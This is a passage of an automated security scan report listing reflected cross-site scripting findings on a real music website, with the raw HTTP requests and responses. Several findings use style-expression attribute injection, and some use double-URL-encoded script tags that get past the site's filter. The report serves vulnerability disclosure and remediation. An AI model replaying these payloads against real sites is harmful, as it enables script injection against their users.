GET /albumae660'%3b66a4ff2fd7f/rihanna/only-girl-in-the-world HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:21:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87914
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77629"style%3d"x%3aexpression(alert(1))"90366360b68 was submitted in the h parameter. This input was echoed as 77629"style="x:expression(alert(1))"90366360b68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/rihanna/only-girl-in-the-world?h=73335586477629"style%3d"x%3aexpression(alert(1))"90366360b68 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 103890
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Rihanna - Only Girl (In The ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/only-girl-in-the-world?h=73335586477629"style="x:expression(alert(1))"90366360b68" /> ...[SNIP]...
2.136. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/rihanna/only-girl-in-the-world
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c081b"style%3d"x%3aexpression(alert(1))"d068e88c9dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c081b"style="x:expression(alert(1))"d068e88c9dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/rihanna/only-girl-in-the-world?c081b"style%3d"x%3aexpression(alert(1))"d068e88c9dc=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 103894
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Rihanna - Only Girl (In The ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/only-girl-in-the-world?c081b"style="x:expression(alert(1))"d068e88c9dc=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c46a2'%3b0a91471649d was submitted in the REST URL parameter 1. This input was echoed as c46a2';0a91471649d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumc46a2'%3b0a91471649d/susan-boyle/the-gift11 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88329
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 178a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9a6fc79742 was submitted in the REST URL parameter 1. This input was echoed as 178a7"><script>alert(1)</script>e9a6fc79742 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album178a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9a6fc79742/susan-boyle/the-gift11 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88010
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.139. http://bigpondmusic.com/album/susan-boyle/the-gift11 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/susan-boyle/the-gift11
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a090"style%3d"x%3aexpression(alert(1))"a680221f896 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a090"style="x:expression(alert(1))"a680221f896 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/susan-boyle/the-gift11?5a090"style%3d"x%3aexpression(alert(1))"a680221f896=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 111091
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Susan Boyle - The Gift - Big ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/susan-boyle/the-gift11?5a090"style="x:expression(alert(1))"a680221f896=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7eadba08219 was submitted in the REST URL parameter 1. This input was echoed as 602e6"><script>alert(1)</script>7eadba08219 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album602e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7eadba08219/taio-cruz/rokstarr2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88103
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71002'%3bb52b77c9e1e was submitted in the REST URL parameter 1. This input was echoed as 71002';b52b77c9e1e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album71002'%3bb52b77c9e1e/taio-cruz/rokstarr2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87821
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c97"style%3d"x%3aexpression(alert(1))"d7b1258e9f1 was submitted in the h parameter. This input was echoed as 57c97"style="x:expression(alert(1))"d7b1258e9f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/taio-cruz/rokstarr2?h=64970803157c97"style%3d"x%3aexpression(alert(1))"d7b1258e9f1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:24:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 119583
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.143. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/taio-cruz/rokstarr2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f37a"style%3d"x%3aexpression(alert(1))"764939ac8af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f37a"style="x:expression(alert(1))"764939ac8af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/taio-cruz/rokstarr2?7f37a"style%3d"x%3aexpression(alert(1))"764939ac8af=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 119146
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61a06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd0cbc868bf was submitted in the REST URL parameter 1. This input was echoed as 61a06"><script>alert(1)</script>fd0cbc868bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album61a06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd0cbc868bf/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:25:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88307
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66c43'%3bf6bdc372dd0 was submitted in the REST URL parameter 1. This input was echoed as 66c43';f6bdc372dd0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album66c43'%3bf6bdc372dd0/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:25:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87915
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bdab"style%3d"x%3aexpression(alert(1))"842ee7acee9 was submitted in the h parameter. This input was echoed as 8bdab"style="x:expression(alert(1))"842ee7acee9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?h=7653777758bdab"style%3d"x%3aexpression(alert(1))"842ee7acee9 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:25:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 139217
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Tom Petty And The Heartbreak ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?h=7653777758bdab"style="x:expression(alert(1))"842ee7acee9" /> ...[SNIP]...
2.147. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c37f"style%3d"x%3aexpression(alert(1))"ce276fa3e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c37f"style="x:expression(alert(1))"ce276fa3e26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?8c37f"style%3d"x%3aexpression(alert(1))"ce276fa3e26=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:25:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 139838
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Tom Petty And The Heartbreak ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?8c37f"style="x:expression(alert(1))"ce276fa3e26=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1 was submitted in the REST URL parameter 1. This input was echoed as 4fd5c"><script>alert(1)</script>4ad0e09dbc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
